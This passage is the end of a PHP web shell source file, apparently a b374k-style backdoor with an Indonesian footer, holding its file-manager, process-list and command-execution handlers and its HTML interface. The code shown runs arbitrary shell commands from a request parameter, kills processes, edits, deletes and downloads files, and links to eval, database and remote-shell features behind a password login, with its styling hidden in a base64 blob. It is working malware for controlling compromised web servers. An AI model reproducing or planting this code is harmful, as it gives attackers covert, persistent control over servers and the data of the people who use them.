1146. <tr><td style=\"width:140px;\">Filename</td><td><span id=\"" . cs($filn) . "_link\">" . $f . "</span>
1147. <form action=\"" . $_SERVER['PHP_SELF'] . "?d=" . $pwd . "&amp;view=" . $f . "\" method=\"post\" id=\"" . cs($filn) . "_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
1148. <input type=\"hidden\" name=\"oldname\" value=\"" . $filn . "\" style=\"margin:0;padding:0;\" />
1149. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"" . $filn . "\" />
1150. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
1151. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
1152. onclick=\"tukar('" . cs($filn) . "_link','" . cs($filn) . "_form');\" />
1153. </form>
1154. </td></tr>
1155. <tr><td>Size</td><td>" . gs($f) . "</td></tr>
1156. <tr><td>Permission</td><td>" . gp($f) . "</td></tr>
1157. <tr><td>Owner</td><td>" . $owner . "</td></tr>
1158. <tr><td>Create time</td><td>" . date("d-M-Y H:i", filectime($f)) . "</td></tr>
1159. <tr><td>Last modified</td><td>" . date("d-M-Y H:i", filemtime($f)) . "</td></tr>
1160. <tr><td>Last accessed</td><td>" . date("d-M-Y H:i", fileatime($f)) . "</td></tr>
1161. <tr><td>Actions</td><td>
1162. <a href=\"?d=" . $pwd . "&amp;edit=" . $f . "\">edit</a> |
1163. <a href=\"javascript:tukar('" . cs($filn) . "_link','" . cs($filn) . "_form');\">rename</a> |
1164. <a href=\"?d=" . $pwd . "&amp;delete=" . $f . "\">delete</a> |
1165. <a href=\"?d=" . $pwd . "&amp;dl=" . $f . "\">download</a>&nbsp;(<a href=\"?d=" . $pwd . "&amp;dlgzip=$f\">gzip</a>)</td></tr>
1166. <tr><td>View</td><td>
1167. <a href=\"?d=" . $pwd . "&amp;view=" . $f . "&amp;type=text\">text</a> |
1168. <a href=\"?d=" . $pwd . "&amp;view=" . $f . "&amp;type=code\">code</a> |
1169. <a href=\"?d=" . $pwd . "&amp;view=" . $f . "&amp;type=image\">image</a></td></tr>
1170. </table>
1171. ";
1172.             $t = "";
1173.             $iinfo = getimagesize($f);
1174.             if (substr($filn, -3, 3) == "php")
1175.                 $t = "code"; if (is_array($iinfo))
1176.                 $t = 'image'; if (isset($_REQUEST['type']))
1177.                 $t = ss($_REQUEST['type']); if ($t == "image") {
1178.                 $width = (int) $iinfo[0];
1179.                 $height = (int) $iinfo[1];
1180.                 $imginfo = "Image type = ( " . $iinfo['mime'] . " )<br />
1181. Image Size = <span class=\"gaul\">( </span>" . $width . " x " . $height . "<span class=\"gaul\"> )</span><br />";
1182.                 if ($width > 800) {
1183.                     $width = 800;
1184.                     $imglink = "<p><a href=\"?d=" . $pwd . "&amp;img=" . $filn . "\" target=\"_blank\">
1185. <span class=\"gaul\">[ </span>view full size<span class=\"gaul\"> ]</span></a></p>";
1186.                 } else
1187.                     $imglink = ""; $s_result .= "<div class=\"viewfilecontent\" style=\"text-align:center;\">" . $imglink . "
1188. <img width=\"" . $width . "\" src=\"?d=" . $pwd . "&amp;img=" . $filn . "\" alt=\"\" style=\"margin:8px auto;padding:0;border:0;\" /></div>";
1189.             } elseif ($t == "code") {
1190.                 $s_result .= "<div class=\"viewfilecontent\">";
1191.                 $file = wordwrap(file_get_contents($f), 160, "\n", true);
1192.                 $buff = highlight_string($file, true);
1193.                 $old = array("0000BB", "000000", "FF8000", "DD0000", "007700");
1194.                 $new = array("4C83AF", "888888", "87DF45", "EEEEEE", "FF8000");
1195.                 $buff = str_ireplace($old, $new, $buff);
1196.                 $s_result .= $buff;
1197.                 $s_result .= "</div>";
1198.             } else {
1199.                 $s_result .= "<div class=\"viewfilecontent\">";
1200.                 $s_result .= nl2br(htmlentities(wordwrap(file_get_contents($f), 160, "\n", true)));
1201.                 $s_result .= "</div>";
1202.             }
1203.         } elseif (is_dir($f)) {
1204.             chdir($f);
1205.             $pwd = cp(getcwd());
1206.             $s_result .= showdir($pwd, $s_prompt, $s_win);
1207.         }
1208.     } elseif (isset($_REQUEST['edit'])) {
1209.         $f = ss($_REQUEST['edit']);
1210.         $fc = "";
1211.         $fcs = "";
1212.         if (is_file($f))
1213.             $fc = file_get_contents($f); if (isset($_REQUEST['fcsubmit'])) {
1214.             $fc = ssc($_REQUEST['fc']);
1215.             if ($filez = fopen($f, "w")) {
1216.                 $time = date("d-M-Y H:i", time());
1217.                 if (fwrite($filez, $fc))
1218.                     $fcs = "file saved <span class=\"gaya\">@</span> " . $time; else
1219.                     $fcs = "failed to save"; fclose($filez);
1220.             } else
1221.                 $fcs = "permission denied";
1222.         } $s_result .= " <form action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"post\">
1223. <textarea id=\"fc\" name=\"fc\" class=\"evalcode\">" . htmlspecialchars($fc) . "</textarea>
1224. <p><input type=\"text\" class=\"inputz\" style=\"width:98%;\" name=\"edit\" value=\"" . $f . "\" /></p>
1225. <p><input type=\"submit\" name=\"fcsubmit\" class=\"inputzbut\" value=\"Save !\" style=\"width:120px;height:30px;\" />
1226. &nbsp;&nbsp;" . $fcs . "</p>
1227. <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />
1228. </form>
1229. ";
1230.     } elseif (isset($_REQUEST['ps'])) {
1231.         $s_result = "<table class=\"explore sortable\">";
1232.         if (!$s_win)
1233.             $h = "ps -aux"; else
1234.             $h = "tasklist /V /FO csv"; $wcount = 11;
1235.         $wexplode = " ";
1236.         if ($s_win)
1237.             $wexplode = "\",\""; $res = exe($h);
1238.         if (trim($res) == '')
1239.             $s_result .= "<p class=\"rs_result\">error: permission denied</p>"; else {
1240.             if (!$s_win)
1241.                 $res = preg_replace('#\ +#', ' ', $res); $psarr = explode("\n", $res);
1242.             $fi = true;
1243.             $tblcount = 0;
1244.             $check = explode($wexplode, $psarr[0]);
1245.             $wcount = count($check);
1246.             foreach ($psarr as $psa) {
1247.                 if (trim($psa) != '') {
1248.                     if ($fi) {
1249.                         $fi = false;
1250.                         $psln = explode($wexplode, $psa, $wcount);
1251.                         $s_result .= "<tr><th>action</th>";
1252.                         foreach ($psln as $p) {
1253.                             $s_result .= "<th>" . trim(trim(strtolower($p)), "\"") . "</th>";
1254.                         } $s_result .= "</tr>";
1255.                     } else {
1256.                         $psln = explode($wexplode, $psa, $wcount);
1257.                         $s_result .= "<tr>";
1258.                         $tblcount = 0;
1259.                         foreach ($psln as $p) {
1260.                             if (trim($p) == "")
1261.                                 $p = "&nbsp;"; if ($tblcount == 0) {
1262.                                 $s_result .= "<td style=\"text-align:center;\"><a href=\"?ps&amp;d=" . $pwd . "&amp;pid=" . trim(trim($psln[1]), "\"") . "\">kill</a></td>
1263. <td style=\"text-align:center;\">" . trim(trim($p), "\"") . "</td>";
1264.                                 $tblcount++;
1265.                             } else {
1266.                                 $tblcount++;
1267.                                 if ($tblcount == count($psln))
1268.                                     $s_result .= "<td style=\"text-align:left;\">" . trim(trim($p), "\"") . "</td>"; else
1269.                                     $s_result .= "<td style=\"text-align:center;\">" . trim(trim($p), "\"") . "</td>";
1270.                             }
1271.                         } $s_result .= "</tr>";
1272.                     }
1273.                 }
1274.             } $s_result .= "</table>";
1275.         }
1276.     } else {
1277.         if (isset($_REQUEST['cmd'])) {
1278.             $cmd = ss($_REQUEST['cmd']);
1279.             if (strlen($cmd) > 0) {
1280.                 if (preg_match('#^cd(\ )+(.*)$#', $cmd, $r)) {
1281.                     $nd = trim($r[2]);
1282.                     if (is_dir($nd)) {
1283.                         chdir($nd);
1284.                         $pwd = cp(getcwd());
1285.                         $s_result .= showdir($pwd, $s_prompt, $s_win);
1286.                     } elseif (is_dir($pwd . $nd)) {
1287.                         chdir($pwd . $nd);
1288.                         $pwd = cp(getcwd());
1289.                         $s_result .= showdir($pwd, $s_prompt, $s_win);
1290.                     } else
1291.                         $s_result .= "<pre>" . $nd . " is not a directory" . "</pre>";
1292.                 } else {
1293.                     $s_r = htmlspecialchars(exe($cmd));
1294.                     if ($s_r != '')
1295.                         $s_result .= "<pre>" . $s_r . "</pre>"; else
1296.                         $s_result .= showdir($pwd, $s_prompt, $s_win);
1297.                 }
1298.             } else
1299.                 $s_result .= showdir($pwd, $s_prompt, $s_win);
1300.         } else
1301.             $s_result .= showdir($pwd, $s_prompt, $s_win);
1302.     } $s_info = "<table class=\"headtbl\"><tr><td>" . $s_software . "</td></tr>";
1303.     $s_info .= "<tr><td>" . $s_system . "</td></tr>";
1304.     if ($s_id != "")
1305.         $s_info .= "<tr><td>" . $s_id . "</td></tr>"; $s_info .= "<tr><td>server ip : " . $s_server_ip . "<span class=\"gaya\"> | </span>your ip : " . $s_my_ip . "<span class=\"gaya\"> | </span>";
1306.     if ($s_safemode)
1307.         $s_info .= "safemode <span class=\"gaya\">ON</span>"; else
1308.         $s_info .= "safemode <span class=\"gaya\">OFF</span>"; $s_info .= "<span class=\"gaya\"> | </span> Time @ Server : " . date("d M Y H:i:s", time());
1309.     $s_info .= "
1310. </td></tr>
1311. <tr><td style=\"text-align:left;\">
1312. <table class=\"headtbls\"><tr>
1313. <td>" . trim($letters) . "</td>
1314. <td>
1315. <span id=\"chpwd\">
1316. &nbsp;<a href=\"javascript:tukar('chpwd','chpwdform')\">
1317. <img height=\"16px\" width=\"16px\" src=\"" . $_SERVER['PHP_SELF'] . "?favicon\" alt=\"Change\" style=\"vertical-align:middle;margin:6px 0;border:0;\" />
1318. &nbsp;&nbsp;</a>" . swd($pwd) . "</span>
1319. <form action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"post\" style=\"margin:0;padding:0;\">
1320. <span class=\"sembunyi\" id=\"chpwdform\">
1321. &nbsp;<a href=\"javascript:tukar('chpwdform','chpwd');\">
1322. <img height=\"16px\" width=\"16px\" src=\"" . $_SERVER['PHP_SELF'] . "?favicon\" alt=\"Change\" style=\"vertical-align:middle;margin:6px 0;border:0;\" />
1323. </a>&nbsp;&nbsp;
1324. <input type=\"hidden\" name=\"d\" class=\"inputz\" style=\"width:300px;\" value=\"" . cp($pwd) . "\" />
1325. <input type=\"text\" name=\"view\" class=\"inputz\" style=\"width:300px;\" value=\"" . $pwd . "\" />
1326. <input class=\"inputzbut\" type=\"submit\" name=\"submit\" value=\"view file / folder\" />
1327. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('chpwdform','chpwd');\" />
1328. </form>
1329. </span>
1330. </td></tr>
1331. </table>
1332. </td></tr>
1333. </table>";
1334. }
1335. ?>
1336.  
1337. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
1338.     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1339.  
1340. <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
1341.  
1342.     <head>
1343.         <title><?php echo $s_title; ?></title>
1344.         <link rel="SHORTCUT ICON" href="<?php echo $_SERVER['PHP_SELF'] . "?favicon"; ?>" />
1345.  
1346.         <style type="text/css"><?php echo gzinflate(base64_decode($style)); ?></style>
1347.  
1348.         <script type="text/javascript" src="<?php echo $_SERVER['PHP_SELF'] . "?sorttable"; ?>"></script>
1349.         <script type="text/javascript">
1350.             function tukar(l,b){
1351.                 if(document.getElementById(l)) document.getElementById(l).style.display = 'none';
1352.                 if(document.getElementById(b)) document.getElementById(b).style.display = 'block';
1353.                 if(document.getElementById(l + '_')) document.getElementById(l + '_').focus();
1354.             }
1355.             function init(){
1356. <?php if (isset($_REQUEST['cmd']))
1357.     echo "if(document.getElementById('cmd')) document.getElementById('cmd').focus();"; ?>
1358.         }
1359.         function clickcmd(){
1360.             var buff = document.getElementById('cmd');
1361.             if(buff.value == '- shell command -') buff.value = '';
1362.         }
1363.         </script>
1364.  
1365.     </head>
1366.  
1367.     <body onLoad="init();">
1368.         <table id="main"><tr><td><?php if ($s_auth) { ?>
1369.                         <div><table id="header"><tr><td style="width:80px;"><table><tr><td><h1><a href="?"><?php echo $s_name; ?></a></h1></td></tr><tr><td style="text-align:right;"><div class="ver"><?php echo $s_ver; ?></div></td></tr></table></td>
1370.                                     <td><div class="headinfo"><?php echo $s_info; ?></div></td></tr></table>
1371.                         </div>
1372.                         <div style="clear:both;"></div>
1373.                         <div id="menu">
1374.                             <table style="width:100%;"><tr>
1375.                                     <td><a href="?&d=<?php echo $pwd; ?>" title="Explorer"><div class="menumi">xpl</div></a></td>
1376.                                     <td><a href="?ps&d=<?php echo $pwd; ?>" title="Display process status"><div class="menumi">ps</div></a></td>
1377.                                     <td><a href="?eval&d=<?php echo $pwd; ?>" title="PHP eval function"><div class="menumi">eval</div></a></td>
1378.                                     <td><a href="?phpinfo&d=<?php echo $pwd; ?>" title="Information about current state of PHP"><div class="menumi">php</div></a></td>
1379.                                     <td><a href="?db&d=<?php echo $pwd; ?>" title="Connect to database"><div class="menumi">db</div></a></td>
1380.                                     <td><a href="?rs&d=<?php echo $pwd; ?>" title="Remote Shell"><div class="menumi">rs</div></a></td>
1381.                                     <td style="width:100%;padding:0 0 0 6px;">
1382.                                         <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"><span class="prompt"><?php echo $s_prompt; ?></span>
1383.                                             <input id="cmd" onclick="clickcmd();" class="inputz" type="text" name="cmd" style="width:70%;" value="<?php
1384.     if (isset($_REQUEST['cmd']))
1385.         echo ""; else
1386.         echo "- shell command -";
1387.     ?>" />
1388.                                             <noscript><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:80px;" /></noscript>
1389.                                             <input type="hidden" name="d" value="<?php echo $pwd; ?>" />
1390.                                         </form>
1391.                                     </td>
1392.                                 </tr>
1393.                             </table>
1394.                         </div>
1395.                         <div id="content" id="box_shell">
1396.                             <div id="result"><?php echo $s_result; ?></div>
1397.                         </div><?php } else { ?>
1398.                         <div style="width:100%;text-align:center;">
1399.  
1400.                             <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
1401.                                 <img src="?favicon" style="margin:2px;vertical-align:middle;" />
1402.     <?php echo $s_name; ?>&nbsp;<span class="gaya"><?php echo $s_ver; ?></span><input id="login" class="inputz" type="password" name="login" style="width:120px;" value="" />
1403.                                 <input class="inputzbut" type="submit" value="Go !" name="submitlogin" style="width:80px;" />
1404.                             </form>
1405.                         </div>
1406.  
1407. <?php } ?>
1408.                 </td></tr></table>
1409.         <p class="footer">Jayalah Indonesiaku &copy;<?php echo date("Y", time()) . " " . $s_name; ?></p>
1410.     </body>
1411. </html>